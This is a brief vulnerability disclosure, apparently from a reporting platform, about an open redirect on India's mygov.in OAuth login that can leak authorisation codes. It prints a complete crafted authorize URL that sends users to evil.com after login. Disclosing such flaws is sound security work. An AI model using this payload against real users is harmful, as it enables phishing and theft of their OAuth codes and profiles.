Published on Aug. 30, 2020, 6:38 a.m.

Reported on https://auth.mygov.in/

Open Redirection with oauth code stealing in indian government's mygov.in webapp. The URL : https://auth.mygov.in/oauth2/authorize?response_type=code&client_id=MyGovStartUpIndia&redirect_uri=http://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve&scope=user_profile&state=https://evil.com/ will redirect the user of mygov.in to evil.com after that user logs in with correct credentials. This makes the attack more effective because hacker can redirect the real users who has account in mygov.in . And the attacker site will also get access to his profile with the OAuth code.